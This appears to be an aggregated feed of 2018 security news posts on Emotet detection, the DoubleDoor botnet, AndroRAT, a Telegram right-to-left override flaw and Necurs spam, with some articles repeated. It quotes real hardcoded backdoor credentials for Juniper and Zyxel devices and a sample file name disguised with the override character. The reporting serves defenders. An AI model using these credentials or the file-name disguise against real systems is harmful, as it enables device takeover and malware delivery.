When the client-based machine learning model predicts a high probability of maliciousness, a rich set of feature vectors is then prepared to describe the content. These feature vectors include:

  • Behavior during emulation, such as API calls and executed code
  • Similarity fuzzy hashes
  • Vectors of content descriptive flags optimized for use in ML models
  • Researcher-driven attributes, such as packer technology used for obfuscation
  • File name
  • File size
  • Entropy level
  • File attributes, such as number of sections
  • Partial file hashes of the static and emulated content

This set of features form a signal sent to the Windows Defender AV cloud protection service, which runs a wide array of more complex models in real-time to instantly classify the signal as malicious or benign.

Real-time cloud machine learning models

Windows Defender AVs cloud-based real-time classifiers are powerful and complex ML models that use a lot of memory, disk space, and computational resources. They also incorporate global file information and Microsoft reputation as part of the Microsoft Intelligent Security Graph (ISG) to classify a signal. Relying on the cloud for these complex models has several benefits. First, it doesnt use your own computers precious resources. Second, the cloud allows us to take into consideration the global information and reputation information from ISG to make a better decision. Third, cloud-based models are harder for cybercriminals to evade. Attackers can take a local client and test our models without our knowledge all day long. To test our cloud-based defenses, however, attackers have to talk to our cloud service, which will allow us to react to them.

The cloud protection service is queried by Windows Defender AV clients billions of times every day to classify signals, resulting in millions of malware blocks per day, and translating to protection for hundreds of millions of customers. Today, the Windows Defender AV cloud protection service has around 30 powerful models that run in parallel. Some of these models incorporate millions of features each; most are updated daily to adapt to the quickly changing threat landscape. All together, these classifiers provide an array of classifications that provide valuable information about the content being scanned on your computer.

Classifications from cloud ML models are combined with ensemble ML classifiers, reputation-based rules, allow-list rules, and data in ISG to come up with a final decision on the signal. The cloud protection service then replies to the Windows Defender client with a decision on whether the signal is malicious or not all in a fraction of a second.

Figure 4. Windows Defender AV cloud protection service workflow.

In the Emotet outbreak, one of our cloud ML servers in North America received the most queries from customers; corresponding to where the outbreak began. At least nine real-time cloud-based ML classifiers correctly identified the file as malware. The cloud protection service replied to signals instructing the Windows Defender AV client to block the attack using two of our ML-based threat names, Trojan:Win32/Fuerboos.C!cl and Trojan:Win32/Fuery.A!cl.

This automated process protected customers from the Emotet outbreak in real-time. But Windows Defender AVs artificial intelligence didnt stop there.

Deep learning on the full file content

Automatic sample submission, a Windows Defender AV feature, sent a copy of the malware file to our backend systems less than a minute after the very first encounter. Deep learning ML models immediately analyzed the file based on the full file content and behavior observed during detonation. Not surprisingly, deep neural network models identified the file as a variant of Trojan:Win32/Emotet, a family of banking Trojans.

While the ML classifiers ensured that the malware was blocked at first sight, deep learning models helped associate the threat with the correct malware family. Customers who were protected from the attack can use this information to understand the impact the malware might have had if it were not stopped.

Additionally, deep learning models provide another layer of protection: in relatively rare cases where real-time classifiers are not able to come to a conclusive decision about a file, deep learning models can do so within minutes. For example, during the Bad Rabbit ransomware outbreak, Windows Defender AV protected customers from the new ransomware just 14 minutes after the very first encounter.

Intelligent real-time protection against modern threats

Machine learning and AI are at the forefront of the next-gen real-time protection delivered by Windows Defender AV. These technologies, backed by unparalleled optics into the threat landscape provided by ISG as well as world-class Windows Defender experts and researchers, allow Microsoft security products to quickly evolve and scale to defend against the full range of attack scenarios.

Cloud-delivered protection is enabled in Windows Defender AV by default. To check that its running, go to Windows Settings > Update & Security > Windows Defender. Click Open Windows Defender Security Center, then navigate to Virus & threat protection > Virus &threat protection settings, and make sure that Cloud-delivered protection and Automatic sample submission are both turned On.

In enterprise environments, the Windows Defender AV cloud protection service can be managed using Group Policy, System Center Configuration Manager, PowerShell cmdlets, Windows Management Instruction (WMI), Microsoft Intune, or via the Windows Defender Security Center app.

The intelligent real-time defense in Windows Defender AV is part of the next-gen security technologies in Windows 10 that protect against a wide spectrum of threats. Of particular note, Windows 10 S is not affected by this type of malware attack. Threats like Emotet wont run on Windows 10 S because it exclusively runs apps from the Microsoft Store. Learn more about Windows 10 S. To know about all the security technologies available in Windows 10, read Microsoft 365 security and management features available in Windows 10 Fall Creators Update.

 

Geoff McDonald, Windows Defender Research
with Randy Treit and Allan Sepillo

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Valentine’s Day malware surge is a test of corporate email defences

It may be a day for love and for lovers, but Valentine’s Day is also living up to expectations as a magnet for cybercriminal activity.Advising of an ongoing dating-spam campaign

The post Valentine’s Day malware surge is a test of corporate email defences appeared first on The Cyber Security Place.

DoubleDoor, a new IoT Botnet bypasses firewall using two backdoor exploits

Security researchers spotted a new IoT botnet dubbed DoubleDoor that is able to bypass firewall as well as modem security using two backdoor exploits.

IoT devices continue to be a privileged target of cyber criminals, cyber attackers against so-called smart objects has seen a rapid evolution. Security researchers at NewSky Security (NewSky Security) have detected a new IoT botnet dubbed DoubleDoor that is able to bypass firewall as well as modem security using two backdoor exploits.

The analysis of the honeypot logs allowed the researchers to detect the new threat, it leverages two known backdoor exploits to manage two levels of authentications.

The first malicious code is the Juniper Networks SmartScreen OS exploit, it triggers the flaw CVE-2015–7755 to bypass the firewall authentication.

CVE-2015–7755 hardcoded backdoor affects the Juniper Networks’ ScreenOS software that powers their Netscreen firewalls.

“Essentially the telnet and SSH daemons of Netscreen firewalls can be accessed by using the hardcoded password <<< %s(un=’%s’) = %u with any username, regardless of it being valid or not.We saw its implementation in the initial attack cycle of DoubleDoor as it attacked our honeypots with username “netscreen” and the backdoor password.” wrote Ankit Anubhav, Principal Researcher, NewSky Security.

Once succeeded, the malicious code uses the CVE-2016–10401 Zyxel modem backdoor exploit to take full control over the IoT device.

The code is a privilege escalation exploit, “which is why the DoubleDoor attackers also performed a password based attack to get a basic privilege account like admin:CenturyL1nk before going for the superuser.”

“This time it was CVE-2016–10401 , a backdoor for ZyXEL PK5001Z devices. This backdoor is straight forward too, with a hardcoded su password as zyad5001.” continues the expert.

DoubleDoor

The experts highlighted that differently from other IoT botnets like Satori or Masuta, the DoubleDoor botnet doesn’t use a unique string in the reconnaissance phase.

“after the threat actors have performed the attack, they want a confirmation whether they were successful of getting control of the IoT device. For this, they try to invoke the shell with invalid commands. If the attacker has succeeded, it will show “{string}: applet not found” where {string} is the invalid command.” observed the research.

“DoubleDoor botnet takes care of this, by using a randomized string in every attack”

The DoubleDoor botnet seems to be in an early stage, most of the attacks are originated from South Korean IPs.

The botnet includes the code to target a limited number of devices, it will succeed only if the victim has a specific unpatched version of Juniper ScreenOS firewall which protects unpatched Zyxel modems.

“Double layer of IoT protection is more common in corporate environments, which don’t rely on built-in IoT authentication and like to protect it with another layer of firewall. Although such corporate devices can be lesser in number, getting control of corporate environment routers can be more valuable for an attacker as it can lead to targeted IoT attacks.” concluded the experts.

Pierluigi Paganini

(Security Affairs – DoubleDoor , IoT botnet)

The post DoubleDoor, a new IoT Botnet bypasses firewall using two backdoor exploits appeared first on Security Affairs.

Financial services firms most adept at making balanced security investments

Cyber attacks cost financial services firms more to address and contain than in any other industry, and the rate of breaches in the industry has tripled over the past five

The post Financial services firms most adept at making balanced security investments appeared first on The Cyber Security Place.

Never Mind Malware – Social Engineering Will Be Your Biggest Threat This Year

As we enter a new year, IT security teams and cyber-criminals are both already searching for the development that will tip the scales in the on-going cyber arms race. A

The post Never Mind Malware – Social Engineering Will Be Your Biggest Threat This Year appeared first on The Cyber Security Place.

NBlog February 14 – IoT security & privacy standard

I've just added another new page to ISO27001security.com for ISO/IEC 27030, a standard now being developed for IoT security and privacy.

I've been arguing for years that it would be appropriate, since they specify a risk-based approach to security management, for the ISO27k standards to specify the information risks they address. To that end, I've published a PIG (Probability Impact Graph) graphic from the NoticeBored security awareness module on IoT and BYOD, to set the ball rolling ...



There seems little chance of persuading ISO/IEC to incorporate such a colorful image in the standard, unfortunately, but hopefully the analytical approach will at least prove useful for the project team busily drafting the new standard.

On the web page I've described the red and amber zone IoT risks. I'm sure we could have an excellent discussion about those and other risks in the committee, except there is never enough time at the twice-yearly SC27 meetings to get far into the nitty-gritty of stuff like this. Instead I'll see whether I can raise any interest on the ISO27k Forum, perhaps feeding relevant content and creative suggestions to SC27 via formal comments submitted by NZ Standards - the tedious, antiquated, laborious, slow and expensive approach that we are presently lumbered with. It hardly seems worth the effort.

A new variant of the dreaded AndroRAT malware appeared in threat landscape

Security researchers from Trend Micro detected a new variant of the popular AndroRAT Android RAT in the criminal ecosystem.

Security experts from Trend Micro reported the availability of a new variant of the popular AndroRAT.

The malware was first born in 2012 as a university project, designed as an open-source client/server application to offer remote control of a device. Unfortunately, hackers noticed the capabilities of the threat and started using it.

The new version includes the code to trigger the CVE-2015-1805, it is a local elevation of privilege flaw that affects the kernel of the Android OS of certain devices.

The vulnerability is ranked as critical and can be exploited by rooting applications that users have installed on their devices to elevate privileges and run arbitrary code on the vulnerable device.

The security flaw is very old, it was discovered in the upstream Linux kernel years ago and fixed in April 2014. Unfortunately, the flaw was underestimated until last early 2016 when the C0RE Team reported to Google that it was possible to exploit it to target the Android OS.

All unpatched Android devices running OS based on kernel versions 3.4, 3.10 and 3.14, including all Nexus devices are vulnerable to the CVE-2015-1805 vulnerability.

“Trend Micro detected a new variant of Android Remote Access Tool (AndroRAT) (identified as ANDROIDOS_ANDRORAT.HRXC) that has the ability to inject root exploits to perform malicious tasks such as silent installation, shell command execution, WiFi password collection, and screen capture.” states the analysis published by Trend Micro.

The new AndroRAT variant masquerades as a utility app called TrashCleaner that is likely delivered from a malicious URL. Once launched, the TrashCleaner will prompt the user to install a Chinese-labeled calculator app, hide its icon from the device’s UI, and activates the RAT in the background.

AndroRAT

The new variant included the following additional features:

  • Theft of mobile network information, storage capacity, rooted or not
  • Theft of list of installed applications
  • Theft of web browsing history from pre-installed browsers
  • Theft of calendar events
  • Record calls
  • Upload files to victim device
  • Use front camera to capture high resolution photos
  • Delete and send forged SMS
  • Screen capture
  • Shell command execution
  • Theft of WiFi passwords
  • Enabling accessibility services for a key logger silently

Experts recommend downloading apps only from official stores and keeping updated the OS and the apps.

Pierluigi Paganini

(Security Affairs – AndroRAT  CVE-2015-1805)

The post A new variant of the dreaded AndroRAT malware appeared in threat landscape appeared first on Security Affairs.

Security Affairs: A new variant of the dreaded AndroRAT malware appeared in threat landscape

Security researchers from Trend Micro detected a new variant of the popular AndroRAT Android RAT in the criminal ecosystem.

Security experts from Trend Micro reported the availability of a new variant of the popular AndroRAT.

The malware was first born in 2012 as a university project, designed as an open-source client/server application to offer remote control of a device. Unfortunately, hackers noticed the capabilities of the threat and started using it.

The new version includes the code to trigger the CVE-2015-1805, it is a local elevation of privilege flaw that affects the kernel of the Android OS of certain devices.

The vulnerability is ranked as critical and can be exploited by rooting applications that users have installed on their devices to elevate privileges and run arbitrary code on the vulnerable device.

The security flaw is very old, it was discovered in the upstream Linux kernel years ago and fixed in April 2014. Unfortunately, the flaw was underestimated until last early 2016 when the C0RE Team reported to Google that it was possible to exploit it to target the Android OS.

All unpatched Android devices running OS based on kernel versions 3.4, 3.10 and 3.14, including all Nexus devices are vulnerable to the CVE-2015-1805 vulnerability.

“Trend Micro detected a new variant of Android Remote Access Tool (AndroRAT) (identified as ANDROIDOS_ANDRORAT.HRXC) that has the ability to inject root exploits to perform malicious tasks such as silent installation, shell command execution, WiFi password collection, and screen capture.” states the analysis published by Trend Micro.

The new AndroRAT variant masquerades as a utility app called TrashCleaner that is likely delivered from a malicious URL. Once launched, the TrashCleaner will prompt the user to install a Chinese-labeled calculator app, hide its icon from the device’s UI, and activates the RAT in the background.

AndroRAT

The new variant included the following additional features:

  • Theft of mobile network information, storage capacity, rooted or not
  • Theft of list of installed applications
  • Theft of web browsing history from pre-installed browsers
  • Theft of calendar events
  • Record calls
  • Upload files to victim device
  • Use front camera to capture high resolution photos
  • Delete and send forged SMS
  • Screen capture
  • Shell command execution
  • Theft of WiFi passwords
  • Enabling accessibility services for a key logger silently

Experts recommend downloading apps only from official stores and keeping updated the OS and the apps.

Pierluigi Paganini

(Security Affairs – AndroRAT  CVE-2015-1805)

The post A new variant of the dreaded AndroRAT malware appeared in threat landscape appeared first on Security Affairs.



Security Affairs

Millions of Android devices forced to mine Monero for crooks

No device is safe from criminals looking to make it stealthily mine cryptocurrency for them. However weak its processing power is, it still costs them nothing. With that in mind, forced crypto mining attacks have also begun hitting mobile phones and tablets en masse, either via Trojanized apps or redirects and pop-unders. An example of the latter approach has been recently documented by Malwarebytes’ researchers. The attack “In a campaign we first observed in late … More

Hackers in the Russian underground exploited a Telegram Zero-Day vulnerability to deliver malware

Security researcher Alexey Firsh at Kaspersky Lab last discovered a Telegram zero-day in the desktop Windows version that was exploited in attacks in the wild.

Security researcher Alexey Firsh at Kaspersky Lab last discovered a zero-day vulnerability in the desktop Windows version of the popular Telegram instant messaging app.

The bad news is that the Telegram zero-day flaw was being exploited by threat actors in the wild to deliver cryptocurrency miners for Monero and ZCash.

According to the expert, hackers have actively exploited the vulnerability since at least March 2017. Attackers tricked victims into downloading cryptocurrency miners or to establish a backdoor.

“In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.” reads the analysis of the expert.

The flaw is related to the way Telegram Windows client handles the RLO (right-to-left override) Unicode character (U+202E), which is used for any language that uses a right to left writing mode, like Arabic or Hebrew.

The attackers used a hidden RLO Unicode character in the file name that reversed the order of the characters, in this way the file name could be renamed. In a real attack scenario, then the attackers sent the file to the target recipient.

The crooks craft a malicious code to be sent in a message, let assume it is a JS file that is renamed as follows:

evil.js -> photo_high_re*U+202E*gnp.js  (— *U+202E* is the RLO character)

The RLO character included in the file name is used by an attacker to display the string gnp.js in reverse masquerading the fact that the file is a js and tricking the victims into believing that it is a harmless .png image.

Telegram zero-day

When the user clicks on the file, Windows displays a security notification if it hasn’t been disabled in the system’s settings.

telegram zero-day

If the user ignores the notification and clicks on ‘Run’, the malicious code executed.

The expert reported the Telegram zero-day to the company that promptly patched the flaw.

“Kaspersky Lab reported the vulnerability to Telegram and, at the time of publication, the zero-day flaw has not since been observed in messenger’s products.” states the analysis published by Kaspersky.

“During their analysis, Kaspersky Lab experts identified several scenarios of zero-day exploitation in the wild by threat actors.”

The analysis of the servers used by the attackers revealed the presence of archives containing a Telegram’s local cache, this means that threat actors exploited the flaw to steal data from the victims.

In another attack scenario, crooks triggered the flaw to install a malware that leverages the Telegram API as a command and control mechanism.

“Secondly, upon successful exploitation of the vulnerability, a backdoor that used the Telegram API as a command and control protocol was installed, resulting in the hackers gaining remote access to the victim’s computer. After installation, it started to operate in a silent mode, which allowed the threat actor to remain unnoticed in the network and execute different commands including the further installation of spyware tools.” continues the analysis.

According to the researcher, the flaw was known only in the Russia crime community, it was not triggered by other crooks.

To mitigate the attack, download and open files only from trusted senders.

The security firm also recommended users to avoid sharing any sensitive personal information in messaging apps and make sure to have a good antivirus software from reliable company installed on your systems.

 

Pierluigi Paganini

(Security Affairs – Telegram Zero-Day, hacking)

The post Hackers in the Russian underground exploited a Telegram Zero-Day vulnerability to deliver malware appeared first on Security Affairs.

Bromium: Hackers Keep it Simple: Malware Evades Detection by Simply Copying a File

  • New malware technique evades detection by simply copying a file
  • We break it down step-by-step to show you how it works
  • Innovative hackers continue to deliver sophisticated malware that evades detection

The Bromium Lab is back to break down a recent outbreak of sneaky malware, shared with us by some of our customers who caught this in their isolated micro-VMs.

For decades, malware has tried to avoid detection in evermore cunning ways:

  • First, files became polymorphic so that simply checking files on disk wouldn’t work.
  • Then malware behavior became polymorphic too so that detection tools would struggle to spot the malware’s activity in the noise and chaos of typical PC operations.

Still, behavior analysis remains the main strategy for the detection-based security industry.

Watch application isolation in action: see Bromium contain malware.

Now, we are seeing a depressingly simple, obvious way to avoid this sort of detection: copy a file. To fully understand this latest approach, let me provide a quick primer on how detection-based security products work. If you’re already an expert, feel free to scroll down.

+++

In the normal operation of a PC, applications (such as Word) constantly make requests to the operating system (OS), and more specifically to the OS “kernel”—the most powerful part of the operating system.

Common requests would be:

  • Open that file
  • Display this picture on the screen
  • Play that sound
  • Etc, etc, all day long

 

Malware Evades Detection by Simply Copying a File

Any malware in a Word application will likely need to ask the kernel to do its evil bidding.

Malware Evades Detection by Simply Copying a File

So, the detection industry monitors all these requests from applications (like Word) into the kernel. They hope to spot a pattern of suspicious requests and alert you to malicious activity.

One way to detect suspicious activity is to intercept these requests as they pass through “kernel32.dll.” That’s a standard part of the Windows OS that allows normal applications (“user-space code”) to make requests into the kernel (“kernel-space”). Like this:

Malware Evades Detection by Simply Copying a File

Detection products aim to separate the wheat from the chaff and spot the pattern of odd behavior that would imply that something dubious is running within Word. Unfortunately for detection-based security, it’s mathematically impossible to do that with 100% correctness, but that’s another story. Read more about The Halting Problem.

+++

Returning to this particular flavor of malware, we see a rather simple, cunning way to bypass the detection products: It simply copies kernel32.dll.

Malware Evades Detection by Simply Copying a File

The copied version is identical, and so serves to relay requests from Word into the kernel in precisely the same way. However, the copy name is subtly different. Therefore, some products fail to detect the malware activity as it passes from Word to the kernel.

Once it can talk to the kernel, the malware can launch new processes to begin its reign of terror:

  • Does some process hollowing of “svchost.exe”
  • Installs Tor so it can create anonymous connections via the “dark web” to its command-and-control server
  • Sits and listens, awaiting instructions from its masters to encrypt your documents, steal your secrets, spy on your staff, or whatever else its commanders want it to do.

Malware Evades Detection by Simply Copying a File

Detection-based security is flawed.

There are always new ways for the malware authors to outsmart detection tools. In this example, Bromium’s detection engine identified the malware, but that’s not always the case. Bromium doesn’t claim to detect everything, nobody can. For our customers who shared this data with us, the malware played out exactly as the authors intended … but it did so in an isolated, micro-VM, and the malware was unable to harm or impact the host or the network.

On behalf of the Bromium Lab team, we look forward to capturing the next installment of malware in our micro-VMs, and, of course, sharing the details with you.

 

Get started today. Contact Bromium to request a demo.

The post Hackers Keep it Simple: Malware Evades Detection by Simply Copying a File appeared first on Bromium.





Bromium

Kotlin-based malicious apps penetrate Google market

An open-source programming language, Kotlin is a fully-supported official programming language for Android. Google boasts that Kotlin contains safety features in order to make apps “healthy by default.” Many apps are already built with Kotlin, from the hottest startups to Fortune 500 companies. (Twitter, Uber, Pinterest)

Concise while being expressive, Kotlin reduces the amount of boilerplate code needed to create an app—which makes it much safer. However, as revealed by Trend Micro researchers, the first samples of Android malware created using Kotlin were found on Google Play. Introducing: Swift Cleaner, a utility tool built with Kotlin that claims to clean and optimize Android devices.

This malicious app is capable of remote command execution, can steal personal information, carry out click fraud, and sign users up to premium SMS subscription services without their permission. So much for safe.

Analyze this

Subsequently, after launching Swift Cleaner, the first thing the malware does is call PspManager.initSDK, check the phone number, and send an SMS message to the particular number that is given by the C&C server. The app initiates this to check for a SIM card presence and if mobile carrier services are available.

Upon server interaction, the malicious part of the app launches URL forwarding and click fraud activities. Click fraud is an illegal practice that occurs when individuals click on a website’s advertisements (either banner ads or paid text links) to increase the payable number of clicks to the advertiser. In our case, the app clicks on a URL, which leads you to a survey. At the end of the survey, you are given an opportunity to get some free services if you click on the claim link. By clicking the button, you will then be redirected to another possibly malicious website.

Meanwhile, Swift Cleaner collects personal information from the infected mobile device, such as the International Mobile Equipment Identity (IMEI), International Mobile Subscriber Identity (IMSI), and information about the SIM card. The stolen information is then encrypted and sent to the remote Command and Control (C&C) server.

There are services that run in the background in order to communicate with a C&C server. Swift Cleaner compromises one of these services: the Wireless Application Protocol (WAP). WAP is a technical standard for accessing information over a mobile wireless network.

The app is using WAP in conjunction with JavaScript in order to bolt on CAPTCHA bypass functionality, using mobile data and analyzing the image base64 code. CAPTCHA images are parsed and cracked, and the image data will later be uploaded to the C&C server. This data is needed to train the neural network. Later on, all the image samples will be useful for finding the best match for each character of the new upcoming CAPTCHA.

Premium SMS service

The Swift Cleaner malware also uploads information about the user’s service provider along with login information and similar sensitive data to the C&C server. This can automatically sign users up for a premium SMS service, which will cost money.

Premium rate SMS is a way of mobile billing where user pays for a premium service by either receiving or sending a message. There are two ways this billing service works:

  1. Mobile Originated (MO): where the mobile user pays to send a message (used for once-off services, such as competitions)
  2. Mobile Terminated (MT): where the mobile user pays to receive a message (used for subscription services)

Our example app uses the premium SMS MO service, and redirects users to webpages where they can select to send a message.

Neverending story

As of now, Google has removed the fake Swift Cleaner apps carrying this new malware from the Play Store. However, even if Google states that their protection is on a high level, there appears to be no fail-proof way to stop malware from entering the Play store. By using a quality mobile anti-malware scanner as second layer of protection, you can stay safe even when Google Play Protect fails. We (as always) recommend Malwarebytes for Android. Stay safe out there!

The post Kotlin-based malicious apps penetrate Google market appeared first on Malwarebytes Labs.

Security Affairs: Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in seasonal campaigns of Valentine’s Day-themed spam emails.

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in the activity of the infamous botnet.

Necurs was not active for a long period at the beginning of 2017 and resumed it activity in April 2017. The Necurs botnet was used in the past months to push many other malware, including LockyJaffGlobeImposterDridex , Scarab and the Trickbot.

Scammers are mow using the Necurs botnet to send out an amazing number of messages offering companionship waiting for Valentine’s day.

Crooks are using the spam messages to trick victims into sharing personal photos that are used later by cybercriminals to blackmail the victims.

According to the IBM X-Force team, the campaign started in mid-January, it leverages the overall Necurs botnet that is composed of 6 million bots.

“The current campaign from Necurs reached over 230 million spam messages within a matter of two weeks as the botnet spewed tens of millions of messages in two major bouts. The first surge started on Jan. 16 and ran through Jan. 18; the second started on Jan. 27 and died down on Feb. 3.” reads the analysis published by X-Force researchers.

The expert spotted two current campaigns that sent out a total 230 million spam messages in 14 days-period.

necurs spammers valentines day

 

The first campaign reached a peak between Jan. 16 and Jan. 18 and the second one began on Jan. 27 and lasted through Feb. 3. Researchers observed an average 30 million spam messages were sent each day.

“Looking at the messages being sent out in excess of 30 million emails a day, the current campaign delivers short email blurbs from supposed Russian women living in the U.S. While typical spam email is notorious for bad spelling and grammar, these samples are rather well-worded.” continues the analysis.”

The experts determined that the spam messages are being sent from about 950,000 unique IP addresses, Most of IP are hosted in Vietnam and India while the top sender IP address is hosted via a Pakistani-based ISP.

“Together, Vietnam and India hosted 55 percent of the IPs from which the spam originated. It’s worth noting that spammers constantly shuffle the resources they leverage and the originating IPs logged in one campaign are not likely to be used in the next one. This is how fraudsters avoid blacklists and blocking.” added the researchers.

After the takedowns of the Andromeda and Avalanche botnets, Necurs remains the largest spam distributor in the cybercrime ecosystem. Crooks will continue to leverage the Necurs botnet for their spam campaigns, for this reason, the most effective countermeasure is to increase employee awareness on such kind of threats.

 

Pierluigi Paganini

(Security Affairs – Necurs botnet, Valentine’s Day)

The post Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam appeared first on Security Affairs.



Security Affairs

Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in seasonal campaigns of Valentine’s Day-themed spam emails.

Necurs botnet made headline again, the experts at IBM X-Force research team observed a spike in the activity of the infamous botnet.

Necurs was not active for a long period at the beginning of 2017 and resumed it activity in April 2017. The Necurs botnet was used in the past months to push many other malware, including LockyJaffGlobeImposterDridex , Scarab and the Trickbot.

Scammers are mow using the Necurs botnet to send out an amazing number of messages offering companionship waiting for Valentine’s day.

Crooks are using the spam messages to trick victims into sharing personal photos that are used later by cybercriminals to blackmail the victims.

According to the IBM X-Force team, the campaign started in mid-January, it leverages the overall Necurs botnet that is composed of 6 million bots.

“The current campaign from Necurs reached over 230 million spam messages within a matter of two weeks as the botnet spewed tens of millions of messages in two major bouts. The first surge started on Jan. 16 and ran through Jan. 18; the second started on Jan. 27 and died down on Feb. 3.” reads the analysis published by X-Force researchers.

The expert spotted two current campaigns that sent out a total 230 million spam messages in 14 days-period.

necurs spammers valentines day

 

The first campaign reached a peak between Jan. 16 and Jan. 18 and the second one began on Jan. 27 and lasted through Feb. 3. Researchers observed an average 30 million spam messages were sent each day.

“Looking at the messages being sent out in excess of 30 million emails a day, the current campaign delivers short email blurbs from supposed Russian women living in the U.S. While typical spam email is notorious for bad spelling and grammar, these samples are rather well-worded.” continues the analysis.”

The experts determined that the spam messages are being sent from about 950,000 unique IP addresses, Most of IP are hosted in Vietnam and India while the top sender IP address is hosted via a Pakistani-based ISP.

“Together, Vietnam and India hosted 55 percent of the IPs from which the spam originated. It’s worth noting that spammers constantly shuffle the resources they leverage and the originating IPs logged in one campaign are not likely to be used in the next one. This is how fraudsters avoid blacklists and blocking.” added the researchers.

After the takedowns of the Andromeda and Avalanche botnets, Necurs remains the largest spam distributor in the cybercrime ecosystem. Crooks will continue to leverage the Necurs botnet for their spam campaigns, for this reason, the most effective countermeasure is to increase employee awareness on such kind of threats.

 

Pierluigi Paganini

(Security Affairs – Necurs botnet, Valentine’s Day)

The post Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam appeared first on Security Affairs.

Hackers Exploit ‘Telegram Messenger’ Zero-Day Flaw to Spread Malware

A zero-day vulnerability has been discovered in the desktop version for end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash. The Telegram vulnerability was uncovered by security researcher Alexey Firsh from Kaspersky Lab last October and affects only the Windows client of Telegram

AndroRAT Exploiting Vulnerability to Escalate Privileges on Android Devices

A new variant of the Android Remote Access Tool (AndroRAT) is exploiting a vulnerability to escalate privileges on unpatched Android devices. The malware disguises itself as a utility app called “TrashCleaner” and waits for users to download it from a malicious URL. Upon running for the first time, the malicious app forces the device to […]… Read More

The post AndroRAT Exploiting Vulnerability to Escalate Privileges on Android Devices appeared first on The State of Security.

TrendLabs Security Intelligence Blog: New AndroRAT Exploits Dated Permanent Rooting Vulnerability, Allows Privilege Escalation

by Veo Zhang, Jason Gu, and Seven Shen

Trend Micro detected a new variant of Android Remote Access Tool (AndroRAT) (identified as ANDROIDOS_ANDRORAT.HRXC) that has the ability to inject root exploits to perform malicious tasks such as silent installation, shell command execution, WiFi password collection, and screen capture. This AndroRAT targets CVE-2015-1805, a publicly disclosed vulnerability in 2016 that allows attackers to penetrate a number of older Android devices to perform its privilege escalation.

RATs have long been a common Windows threat, so it shouldn’t be a surprise that it has come to Android. A RAT has to gain root access — usually by exploiting a vulnerability — in order to have control over a system. Discovered in 2012, the original authors intended AndroRAT — initially a university project — as an open-source client/server application that can provide remote control of an Android system, which naturally attracted cybercriminals.

Figure 1. Code snippet of the malware executing the exploit

Figure 1. Code snippet of the malware executing the exploit

This new variant of AndroRAT disguises itself as a malicious utility app called TrashCleaner, which is presumably downloaded from a malicious URL. The first time TrashCleaner runs, it prompts the Android device to install a Chinese-labeled calculator app that resembles a pre-installed system calculator. Simultaneously, the TrashCleaner icon will disappear from the device’s UI and the RAT is activated in the background.

Figure 2. Icon of the malicious TrashCleaner

Figure 2. Icon of the malicious TrashCleaner

Figure 3. Icon of the Chinese-labeled calculator app

Figure 3. Icon of the Chinese-labeled calculator app

The configurable RAT service is controlled by a remote server, which could mean that commands may be issued to trigger different actions. The variant activates the embedded root exploit when executing privileged actions. It performs the following malicious actions found in the original AndroRAT:

  • Record audio
  • Take photos using the device camera
  • Theft of system information such as phone model, number, IMEI, etc.
  • Theft of WiFi names connected to the device
  • Theft of call logs including incoming and outgoing calls
  • Theft of mobile network cell location
  • Theft of GPS location
  • Theft of contacts list
  • Theft of files on the device
  • Theft of list of running apps
  • Theft of SMS from device inbox
  • Monitor incoming and outgoing SMS

Apart from the original features of the AndroRAT, it also performs new privileged actions:

  • Theft of mobile network information, storage capacity, rooted or not
  • Theft of list of installed applications
  • Theft of web browsing history from pre-installed browsers
  • Theft of calendar events
  • Record calls
  • Upload files to victim device
  • Use front camera to capture high resolution photos
  • Delete and send forged SMS
  • Screen capture
  • Shell command execution
  • Theft of WiFi passwords
  • Enabling accessibility services for a key logger silently

Targeting CVE-2015-1805

Google already patched CVE-2015-1805 in March 2016, but devices that no longer receive patches or those with a long rollout period are at risk of being compromised by this new AndroRAT variant.  Older versions of Android, which are still being used by a significant number of mobile users, may still be vulnerable.

Countermeasures

Users should refrain from downloading apps from third-party app stores to avoid being targeted by threats like AndroRAT. Downloading only from legitimate app stores can go a long way when it comes to device security. Regularly updating your device’s operating system and apps also reduce the risk of being affected by exploits for new vulnerabilities.

[Read: Secure your mobile device through these easy steps]

End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security for Android™, which is also available on Google Play. For organizations, Trend Micro™ Mobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning. It also protects devices from attacks that leverage vulnerabilities, prevents unauthorized access to apps, and detects/blocks malware and fraudulent websites.

Trend Micro’s Mobile App Reputation Service (MARS) covers Android and iOS threats using leading sandbox and machine learning technologies. The service protects users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.

We disclosed our findings to Google and worked with them on further analyzing the apps that carried the new AndroRAT variant. Google said that the abovementioned apps were never on Google Play, and that they already incorporated detection for CVE-2015-1805 into their compatibility tests. Ideally, any device launched or updated after April 2016 will not be vulnerable.

Indicators of Compromise (IoCs)

SHA256 App Label Package Name
2733377c14eba0ed6c3313d5aaa51171f6aef5f1d559fc255db9a03a046f0e8f TrashCleaner com.cleaner.trashcleaner
fde9f84def8925eb2796a7870e9c66aa29ffd1d5bda908b2dd1ddb176302eced TrashCleaner com.cleaner.trashcleaner
2441b5948a316ac76baeb12240ba954e200415cef808b8b0760d11bf70dd3bf7 TrashCleaner com.cleaner.trashcleaner
909f5ab547432382f34feaa5cd7d5113dc02cda1ef9162e914219c3de4f98b6e TrashCleaner com.cleaner.trashcleaner

 

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

New AndroRAT Exploits Dated Permanent Rooting Vulnerability, Allows Privilege Escalation



TrendLabs Security Intelligence Blog

UK government websites infected by cryptocurrency miners

Hackers injected malicious code into a plug-in for the blind in order to mine for the cryptocurrency Monero.In an attempt to mine cryptocurrency, hackers have injected malicious code into a

